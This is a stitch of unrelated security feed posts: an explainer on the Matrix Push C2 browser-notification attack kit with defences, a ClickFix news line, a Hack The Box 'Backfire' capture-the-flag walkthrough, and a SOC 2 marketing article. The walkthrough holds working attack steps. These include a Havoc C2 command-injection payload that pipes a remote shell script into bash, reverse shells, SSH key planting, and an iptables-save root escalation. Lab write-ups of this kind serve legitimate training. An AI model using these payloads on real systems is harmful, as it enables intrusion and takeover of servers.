Welcome back, my aspiring hackers!

Nowadays, we often discuss the importance of protecting our systems from malware and sophisticated attacks. We install antivirus software, configure firewalls, and maintain vigilant security practices. But what happens when the attack vector isn’t a malicious file or a network exploit, but rather a legitimate browser feature you’ve been trusting?

This is precisely the threat posed by a new command-and-control platform called Matrix Push C2. This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims. The entire attack occurs through your web browser, without first infecting your system through traditional means.

In this article, we will explore the architecture of browser-based attacks and investigate how Matrix Push C2 weaponizes it. Let’s get rolling!

The Anatomy of a Browser-Based Attack

Matrix Push C2 abuses the web push notification system, a legitimate browser feature that websites use to send updates and alerts to users who have opted in. Attackers first trick users into allowing browser notifications through social engineering on malicious or compromised websites.

Once a user subscribes to the attacker’s notifications, the attacker can push out fake error messages or security alerts at will that look scarily real. These messages appear as if they are from the operating system or trusted software, complete with official-sounding titles and icons.

The fake alerts might warn about suspicious logins to your accounts, claim that your browser needs an urgent security update, or suggest that your system has been compromised and requires immediate action. Each notification includes a convenient “Verify” or “Update” button that, when clicked, takes the victim to a bogus site controlled by the attackers. This site might be a phishing page designed to steal credentials, or it might attempt to trick you into downloading actual malware onto your system. Because this whole interaction is happening through the browser’s notification system, no traditional malware file needs to be present on the system initially. It’s a fileless technique that operates entirely within the trusted confines of your web browser.

Inside the Attacker’s Command Center

Matrix Push C2 is offered as a malware-as-a-service kit to other threat actors, sold directly through crimeware channels, typically via Telegram and cybercrime forums. The pricing structure follows a tiered subscription model that makes it accessible to criminals at various levels of sophistication. According to BlackFog company, the Matrix Push C2 costs approximately $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year. Payments are accepted in cryptocurrency, and buyers communicate directly with the operator for access.

From the attacker’s perspective, the interface is intuitive. The campaign dashboard displays metrics like total clients, delivery success rates, and notification interaction statistics.

As soon as a browser is enlisted by accepting the push notification subscription, it reports data back to the command-and-control server.

Matrix Push C2 can detect the presence of browser extensions, including cryptocurrency wallets like MetaMask, identify the device type and operating system, and track user interactions with notifications. Essentially, as soon as the victim permits the notifications, the attacker gains a telemetry feed from that browser session.

Social Engineering at Scale

The core of the attack is social engineering, and Matrix Push C2 comes loaded with configurable templates to maximize the credibility of its fake messages. Attackers can easily theme their phishing notifications and landing pages to impersonate well-known companies and services. The platform includes pre-built templates for brands such as MetaMask, Netflix, Cloudflare, PayPal, and TikTok, each designed to look like a legitimate notification or security page from those providers.

Because these notifications appear in the official notification area of the device, users may assume their own system or applications generated the alert.

Defending Against Browser-Based Command and Control

As cyberwarriors, we must adapt our defensive strategies to account for this new attack vector. The first line of defense is user education and awareness. Users need to understand that browser notification permission requests should be treated with the same skepticism as requests to download and run executable files. Just because a website asks for notification permissions doesn’t mean you should grant them. In fact, most legitimate websites function perfectly well without push notifications, and the feature is often more of an annoyance than a benefit. If you believe that your team needs to update their skills for current and upcoming threats, consider our recently published Security Awareness and Risk Management training.

Beyond user awareness, technical controls can help mitigate this threat. Browser policies in enterprise environments can be configured to block notification permissions by default or to whitelist only approved sites. Network security tools can monitor for connections to known malicious notification services or suspicious URL shortening domains.

Summary

The fileless, cross-platform nature of this attack makes it particularly dangerous and difficult to detect using traditional security tools. However, by combining user awareness, proper browser configuration, and anti-data exfiltration technology, we can defend against this threat.

In this article, we briefly explored how Matrix Push C2 operates, and it’s a first step in protecting yourself and your organization from this emerging attack vector.

Huntress threat researchers are tracking a ClickFix campaign that includes a variant of the scheme in which the malicious code is hidden in the fake image of a Windows Update and, if inadvertently downloaded by victims, will deploy the info-stealing malware LummaC2 and Rhadamanthys.

The post Attackers are Using Fake Windows Updates in ClickFix Scams appeared first on Security Boulevard.

Introduction to Backfire:

In this write-up, we will explore the “Backfire” machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Backfire” machine from Hack The Box by achieving the following objectives:

User Flag:

We obtained the user flag by exploiting two vulnerabilities in the Havoc C2 framework. First, we leveraged a Server-Side Request Forgery (SSRF) vulnerability (CVE-2024-41570) to interact with internal services.. This was chained with an authenticated Remote Code Execution (RCE) vulnerability, allowing execution of arbitrary commands and gaining a reverse shell as the ilya user. To maintain a more stable connection, SSH keys were generated and authorised, which provided reliable access to the system and allowed for the retrieval of the user.txt flag.

Root Flag:

Privilege escalation to root involved targeting the Hardhat C2 service. Using a Python script, we forged a valid JWT token to create a new administrative user. This access allowed us to obtain a reverse shell as the sergej user. Upon further examination, it was discovered that sergej it had sudo privileges on the iptables-save binary. This was abused to overwrite the /etc/sudoers file, granting full root access. With root privileges, the root.txt flag was successfully retrieved.

Enumerating the Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oN nmap_initial.txt 10.10.11.49

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/backfire]
└──╼ $nmap -sC -sV -oA initial 10.10.11.49
# Nmap 7.94SVN scan initiated Tue May 20 16:24:16 2025
Nmap scan report for 10.10.11.49
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u4
| ssh-hostkey: 256 ECDSA and ED25519 keys
443/tcp  open  ssl/http nginx 1.22.1
|_http-server-header: nginx/1.22.1
| tls-alpn: http/1.1, http/1.0, http/0.9
|_http-title: 404 Not Found
| ssl-cert: CN=127.0.0.1, O=TECH CO, ST=Colorado, C=US
| Valid: 2024-12-09 to 2027-12-09
8000/tcp open  http     nginx 1.22.1
|_http-title: Index of /
| http-ls: Volume / with disable_tls.patch and havoc.yaotl files
|_http-open-proxy: Proxy might be redirecting requests
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The output above clearly shows the open ports.

Analysis:

• 22/tcp (SSH): This port is running OpenSSH 9.2p1 on Debian 12. Although no credentials are currently available, it could later serve as a valuable post-exploitation entry point once initial access is established.
• 443/tcp (HTTPS): On the other hand, this port runs Nginx with a self-signed certificate issued for 127.0.0.1. Because it returns a 404 error, it is likely intended for internal use or is misconfigured. Therefore, it may be useful for SSRF exploitation or internal routing if accessible.
• 8000/tcp (HTTP): Most notably, this port reveals a directory listing containing two files: disable_tls.patch and havoc.yaotl. These files are likely related to the Havoc C2 framework. Additionally, Nmap indicates potential open proxy behavior, which could be leveraged for internal access or lateral movement.

Web Enumeration on Backfire Machine:

Web Application Exploration:

Opening the IP in the browser simply displays a 404 error from Nginx, with no useful information on the main page.

The files havoc.yaotl and disable_tls.patch is available for download. Let’s examine their contents to understand their relevance.

The disable_tls.patch file removes encryption from the Havoc C2 WebSocket on port 40056, switching from secure (wss://) to insecure (ws://) communication. A comment suggests someone framed Sergej as inactive, claiming local-only access made the change safe. Although it may seem beneficial in theory, in practice, it significantly undermines internal security. Moreover, such behaviour could potentially indicate deliberate sabotage.

This configuration sets up a control server running only on the local machine (127.0.0.1) using port 40056. It defines two users, “ilya” and “sergej,” each with their passwords. The system frequently runs background tasks every few seconds. Additionally, the system uses Windows Notepad as a placeholder program during certain operations. Furthermore, it listens for incoming connections securely on port 8443; however, it accepts connections only from the local machine. Consequently, the environment remains tightly controlled.

What is Havoc?

Cybersecurity teams use Havoc to test and improve security. As a result, it helps teams control computers they’ve gained access to during testing by sending commands and, in turn, receiving information back.. Created and maintained by Paul Ungur (C5pider).

It has two parts:

• The Teamserver acts like a central hub, managing all connected computers and tasks. It usually runs on a server accessible to the team.
• The Client is the user interface where the team controls everything and sees the results.

Exploitation on the Backfire machine

Create a reverse shell script (e.g., shell.sh), using any filename of your choice.

Initiate the listener to await incoming connections.

Download the exploit script to your machine using the link here

Launch the Python HTTP server to serve the necessary files.

The script imports required libraries and disables urllib3 warnings. It defines a decrypt() function that pads the key to 32 bytes and decrypts data using AES CTR mode.

Backfire Machine Source Code Architecture & CVE-2024-41570 Overview

A WebSocket payload simulates a listener heartbeat for the C2 server:

pythonCopyEdit<code>payload = { ... }
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)

To execute commands, an injection string fetches and runs a shell script:

pythonCopyEdit<code>cmd = "curl http://<IP>:<PORT>/payload.sh | bash"
injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""

This injection is inserted into the Service Name field within another JSON payload. The system serialises the payload, frames it, and sends it via WebSocket.

pythonCopyEdit<code>payload = { ... "Service Name": injection, ... }
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame)
response = read_socket(socket_id)

This exploits a command injection vulnerability, enabling remote code execution.

This Python script demonstrates a remote code execution (RCE) exploit targeting a vulnerable Havoc C2 server. It mimics a legitimate agent registering with the server, establishes a socket connection, and communicates over WebSocket using Havoc’s internal protocol.

The script first injects a malicious payload into the server configuration by exploiting weak input handling. As a consequence of the vulnerability, it can execute arbitrary shell commands on the Teamserver. This, in turn, may allow an attacker to gain full control over the system.

We created a payload that fetches and runs a shell script using curl. The command is injected into the Service Name field to trigger remote code execution on the target system.

pythonCopyEdit<code>cmd = "curl http://10.10.14.132/shell.sh | bash"
injection = """ \\\\\\\" -mbla; """ + cmd + """ 1>&2 && false #"""

First, this injection is placed inside a JSON object, which is then converted into a WebSocket frame. After that, we send the crafted payload over an existing socket connection to the server.

pythonCopyEdit<code>payload = { ... }
payload_json = json.dumps(payload)
frame = build_websocket_frame(payload_json)
write_socket(socket_id, frame, message)

The payload exploits a weakness in how the server handles service names, giving us remote code execution.

This command downloads and runs a shell script from the attacker’s machine, effectively granting remote access. The code serialises the payload to JSON, wraps it in a WebSocket frame, and sends it to the server over an established socket, bypassing standard defences and triggering code execution within the server context.

A specially crafted WebSocket request triggers the RCE vulnerability. Next, the following command demonstrates how to run the exploit:

python3 exploit.py --target https://backfire.htb -i 127.0.0.1 -p 40056

Why This Exploit Targets Port 40056

Port 40056 is the Havoc Teamserver’s listening port. Targeting it lets you reach the internal WebSocket service that handles commands, enabling remote code execution through the vulnerability.

We completed the file transfer as demonstrated above.

We successfully established a reverse shell connection back to us.

The user flag can be retrieved by executing the command cat user.txt.

Escalate to Root Privileges Access on Backfire Machine

Privilege Escalation:

A message found on the target indicates that Sergej installed HardHatC2 for testing and left the configuration at its default settings. It also humorously suggests a preference for Havoc over HardHatC2, likely to avoid learning another C2 framework. The note ends with a lighthearted remark favouring Go over C#, hinting at the author’s language preference.

Since the reverse shell kept dropping, we had to switch over and continue access via SSH instead.

Created an SSH key ssh-keygen and added the public key to backfire‘s authorized_keys to gain access without relying on an unstable reverse shell.

Above is a screenshot showing the backfire.pub file, which we can transfer by copying it directly to the target machine.

This method demonstrates how to paste the file onto the target machine.

The SSH key id_rsa is unexpectedly resulting in a “permission denied (publickey)” error.

Accordingly, we will generate the SSH key directly on the victim’s machine.

You can extract the key from the victim’s machine and securely transfer it to our system.

Initially, we attempted to access the machine via SSH; however, it requires ED25519 key authentication.

We will generate the id_ed25519 public key and set its permissions to 600.

The key is added to the victim’s machine.

Therefore, we can gain SSH access using the id_ed25519 key.

Unfortunately, no SUID binaries are accessible since they require a password, which we do not possess.

Port-Forwarding the port

After further inspection, we identified several open ports; notably, ports 7096 and 5000 drew particular attention due to their potential relevance.

Although both ports 5000 and 7096 appear filtered according to the Nmap scan, we will attempt port forwarding to probe their accessibility from the internal network.

Accessing port 5000 yielded no visible response or content.

Accessing the service on Port 7096 requires credentials, which are currently unavailable.

We successfully created a user account with the username and password set to ‘dark’.

Successfully accessed the HardHat C2 dashboard.

Navigate to the ‘Terminal‘ tab within the implantInteract section.

We can perform a test by executing the id command.

Surprisingly, it worked flawlessly.

Add the SSH id_ed25519 public key to Sergej’s authorized_keys file to enable secure access.

Impressive! The operation was successful.

Finally, we have successfully accessed Sergej’s account using the SSH id_ed25519 key.

Once logged in through SSH, run sudo -l to identify which commands can be executed with elevated privileges. It shows that sudo users have permission to run iptables and iptables-save.

This method takes advantage of how line wrapping works in command comments to inject an SSH key with root privileges. By adding a specially crafted comment containing the SSH key to an iptables rule and then exporting the rules to the root user’s authorized_keys file, you can grant SSH access as root:

sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 ssh key\n'
sudo iptables-save -f /root/.ssh/authorized_keys

We successfully gained root access using the SSH id_ed25519 key.

The root flag can be retrieved by executing the command cat root.txt.

The post Hack The Box: Backfire Machine Walkthrough – Medium Difficulty appeared first on Threatninja.net.

Last Updated on September 17, 2025 by Narendra Sahoo

What is SOC 2 Certification?

SOC 2 certification is an audit framework developed by the AICPA that evaluates an organization’s ability to design and operate effective controls related to security, availability, processing integrity, confidentiality, and privacy. It’s a critical assurance tool for service providers managing customer data in the cloud, demonstrating a commitment to robust internal controls and regulatory compliance.

SOC 2 Certification is today the need of the industry especially for every business offering third-party IT services. Businesses that outsource certain aspects of their data information operations prefer dealing with secure vendors. They prefer working with vendors demonstrating evidence of implementing best security practices and rigorously protect sensitive information.

So, most businesses demand  for a SOC 2 compliant vendor who demonstrates strict adherence to IT security. Achieving SOC 2 certification means vendors have established practices with required levels of security across their organization to protect data. Elaborating more on this, we have listed some of the benefits of attaining SOC2 Certification. Let us take a closer look at the benefits to understand the importance of SOC2 Audit and Attestation/Certification

Benefits of SOC2 Certification

1. Brand Reputation-

SOC 2 Certification is an evidence that the organization has taken all necessary measures to prevent a data breach. This in turn helps in building good credibility and enhances the brand reputation in the market.

2. Competitive Advantage –

Holding a SOC2 Certification/ Attestation definitely gives your business an edge over others in the industry. With so much at stake, businesses are only looking to partner with vendors who are safe and have implemented appropriate measures for preventing data breaches. Vendors are required to complete a SOC 2 Audit to prove they are safe to work with. Besides when pursuing clients that require a SOC 2 report, having one available will give you an advantage over competitors who do not have one.

3. Marketing Differentiator–

Although several companies claim to be secure, they cannot prove that without passing a SOC2 Audit and achieving SOC2 Certificate. Holding a SOC 2 report can be a differentiator for your organization as against those companies in the marketplace who do not hold SOC2 certification and have not made a significant investment of time and capital in SOC2 Compliance. You can market your adherence to rigorous standards with SOC2 Audit and Certification while others cannot.

4. Better Services: –

You can improve your security measures and overall efficiency in operations by undergoing a SOC 2 Audit. Your organization will be well-positioned to streamline processes and controls based on the understanding of the cyber security risks that your customers face. This will overall improve your services.

5. Assured Security:- 

SOC2 Audit & Attestation/Certification gives your company an edge over others as it assures your customers of implemented security measures for preventing breaches, and securing their data. Moreover, the SOC2 report assures the client that the organization has met established security criteria that ensure that the system is protected against unauthorized access (both physical and logical).

6. Preference of SOC2 Certified Vendors-

Most businesses prefer working with SOC2 Certified vendors. For these reasons having SOC 2 certification is crucial for organizations looking to grow their business in the industry.

7. ISO27001 is Achievable–

SOC 2 requirements are very similar to ISO27001 certification. So, having achieved SOC2 certification will make your process of achieving ISO27001 easier. However, it is important to note that clearing a SOC 2 audit does not automatically get you ISO 27001 certification.

8. Operating Effectiveness–

Auditing requirements for SOC2 Type II require compulsory 6 months of evidence and testing of the operating effectiveness of controls in place. So, SOC2 Audit ensure maintaining an effective information security control environment.

9. Commitment to IT security-

SOC2 Audit & Certification demonstrates your organization’s strong commitment towards overall IT security.  A broader group of stakeholders gain assurance that their data is protected and that the internal controls, policies, and procedures are evaluated against industry best practice.

10. Regulatory Compliance- 

As mentioned earlier, SOC 2 requirements go in sync with other frameworks including HIPAA and ISO 27001 certification. So, achieving compliance with other regulatory standards is easy. It can speed up your organization’s overall compliance efforts.

11. Valuable Insight–

A SOC 2 report provides valuable insights into your organization’s risk and security posture, vendor management, internal controls,  governance, regulatory oversight, and much more.

Conclusion

As professionals of the industry, we strongly believe that the benefit of clearing a SOC2 Audit and obtaining a SOC 2 report far outweigh the investment for achieving it.  This is because when a vendor undergoes a SOC 2 audit, it demonstrates that their commitment and that they are invested in providing secure services and ensuring the security of clients’ information.

This, in turn, enhances the business reputation, ensures business continuity, and gives the business a competitive advantage in the industry. VISTA InfoSec specializes in helping clients in their efforts of SOC2 Audit & Attestation.  With 16 + years of experience in this field, businesses can rely on us for an easy and hassle-free SOC2 Compliance process.

FAQ

1.Who needs SOC 2 certification?

Any SaaS provider or cloud-based service that stores, processes, or transmits customer data—especially in regulated industries—should pursue SOC 2 certification to build trust with clients.

2.What is the difference between SOC 2 Type I and Type II?

Type I reviews the design of controls at a specific point in time, while Type II assesses the effectiveness of those controls over a period (usually 3–12 months).

3.How long does it take to get SOC 2 certified?

The SOC 2 process typically takes 3–6 months, depending on an organization’s readiness, existing controls, and whether it’s a Type I or Type II audit.

4. Is SOC 2 mandatory?

SOC 2 is not legally required, but many clients—especially in the B2B tech space—demand it as part of vendor due diligence.

The post Top 11 Benefits of having SOC 2 Certification! appeared first on Information Security Consulting Company - VISTA InfoSec.